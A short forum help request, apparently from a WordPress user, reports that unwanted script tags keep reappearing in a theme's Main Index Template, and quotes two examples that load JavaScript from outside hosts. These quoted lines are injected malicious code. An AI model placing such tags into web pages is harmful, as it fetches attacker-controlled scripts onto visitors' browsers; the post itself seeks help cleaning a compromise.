HELP! Unwanted javascript code keeps getting inserted into Main Index Template

Unwanted code keeps appearing at the top of the Main Index Template on my theme. It throws the home page all out of whack. When I delete the code and Update, it’s back to normal. But it keeps happening by itself. Does anyone know what’s going on and how I can stop it from happening? The code is not always the same. Below are 2 recent examples:

    <script type=”text/javascript” src=”http://187.45.206.10/p/get_applet.php”></script>

    <script type=”text/javascript” src=”http://lig-limp.com.br/rebots.php”></script>
